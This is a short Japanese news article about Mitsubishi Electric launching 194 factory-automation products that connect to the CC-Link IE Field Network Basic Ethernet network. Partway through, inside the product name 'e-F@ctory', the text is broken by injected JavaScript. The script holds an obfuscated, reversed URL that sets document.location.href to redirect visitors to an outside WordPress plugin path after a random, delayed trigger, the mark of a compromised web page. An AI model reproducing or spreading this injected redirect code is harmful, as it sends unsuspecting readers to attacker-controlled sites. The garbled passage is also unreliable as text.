三菱電機は、100Mbpsの汎用Ethernet通信を用いた産業用オープンフィールドネットワーク「CC-Link IEフィールドネットワークBasic」に接続できるシーケンサ(プログラマブルコントローラ)、サーボアンプ、表示器やインバーターなど194機種を10月31日から順次発売している。

1027

CC-Link IEフィールドネットワークBasicは、専門知識がなくても短時間でシステム構築が可能で、リンクデバイスの点数やアドレスの自動設定などにより、システム構築工数を4割削減できる。特に従来、ネットワーク対応が困難だった機器や小規模な装置に貢献できる。

また、汎用Ethernetの活用により、上位ITシステムから生産現場の機器まで1本のネットワーク配線で接続できることで低コスト化を実現。今回、CC-Link IEフィールドネットワークBasic接続に対応するFA製品のラインアップ拡充したことで、自由度の高いネットワーク構築が可能になる。

同社はFA技術とIT技術を活用し開発・生産・保守の全般にわたるトータルコストを削減するソリューション「e-F@ctoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory」を推進しているが、さらにFA製品のラインアップ拡充したことで、適用範囲が小規模装置まで拡大し、生産現場・設備の見える化や高効率化が進むものと期待されている。

なお、CC-Link IEフィールドネットワークBasicに対応するのは、シーケンサ、サーボアンプ、表示器、インバーター、産業用ロボット、CNC制御ユニット、エネルギー計測ユニット、ブロックタイプリモートI/O。